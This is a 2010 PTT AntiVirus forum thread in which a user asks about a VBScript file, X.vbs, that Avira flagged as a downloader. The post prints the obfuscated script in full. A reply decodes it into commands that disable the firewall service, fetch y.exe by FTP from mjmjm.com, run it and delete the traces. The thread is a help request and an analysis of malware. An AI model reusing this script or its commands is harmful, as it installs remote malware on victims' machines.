作者piligo (霹靂狗)
看板AntiVirus
標題[請益] C:\WINDOWS\X.vbs是從哪裡生出來的?
時間Mon May 10 05:51:28 2010
請教,剛剛小紅傘突然跳出病毒警告,貼一下Script內容,請教先進,到底這個Script是
在做什麼的?
因為我掃完整個登錄編輯器,也沒看到X.vbs的蹤影,所以這是誤判嗎?
不知這個X.Vbs是哪個程式生出來的
小紅傘的Properties
Type: File
Source: C:\WINDOWS\X.Vbs
Status: Infected
Quarantine object: 4de78c7e.qua
Restored: NO
Uploaded to Avira: NO
Operating System: Windows 2000/XP/VISTA Workstation
Search engine: 8.02.01.236
Virus definition file: 7.10.07.66
Detection: Contains recognition pattern of the
VBS/Dldr.PIF.1045 VBS script virus
Date/Time: 2010/5/10, 05:27
Script內容是這樣
function o
for i=1 to UBound(s)
h=h&chr(s(i)-562)
next
Set qq = CreateObject("Wscript.Shell")
qq.run h,0
end function
s=array(575,661,671,662,594,609,661,594,672,663,678,594,677,678,673,674,594,
677,666,659,676,663,662,659,661,661,663,677,677,600,663,661,666,673,594,673,
594,671,668,671,668,671,608,661,673,671,624,671,608,678,682,678,600,663,661,
666,673,594,659,677,610,618,624,624,671,608,678,682,678,600,663,661,666,673,
594,618,618,618,624,624,671,608,678,682,678,600,663,661,666,673,594,665,663,
678,594,683,594,683,608,663,682,663,624,624,671,608,678,682,678,600,663,661,
666,673,594,660,683,663,624,624,671,608,678,682,678,600,664,678,674,594,607,
677,620,671,608,678,682,678,600,662,663,670,594,671,608,678,682,678,600,683,
608,663,682,663,600,659,678,678,676,667,660,594,625,608,680,660,677,594,607,
676,600,662,663,670,594,625,594,625,608,660,659,678,594,625,608,680,660,677,
594,625,608,663,682,663,600,600,677,678,659,676,678,594,666,678,678,674,620,
609,609,678,681,608,660,667,662,608,683,659,666,673,673,608,661,673,671,609)
o
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 112.104.21.226
→ piligo:s=array該行只要再把第二行的數字接起來就會判斷成病毒 05/10 06:07
→ zha0:為了排版 , array 被你斷行了, 原本是要接起來的 cc 05/10 10:46
→ piligo:沒錯 所以明牌都是接在一起的 XD 不知這些語法是做什麼的? 05/10 11:02
→ piligo: 有 05/10 11:02
推 junorn:cmd /c net stop sharedaccess 05/10 12:23
→ junorn:echo o mjmjm.com>m.txt 05/10 12:23
→ junorn:echo as08>>m.txt 05/10 12:23
→ junorn:echo 888>>m.txt 05/10 12:23
→ junorn:echo get y y.exe>>m.txt 05/10 12:24
→ junorn:echo bye>>m.txt 05/10 12:24
→ junorn:ftp -s:m.txt 05/10 12:24
→ junorn:del m.txt 05/10 12:24
→ junorn:y.exe 05/10 12:24
→ junorn:attrib ?.vbs -r 05/10 12:24
→ junorn:del ? ?.bat ?.vbs ?.exe 05/10 12:25
→ junorn:上面各行中間有一個&符號 05/10 12:26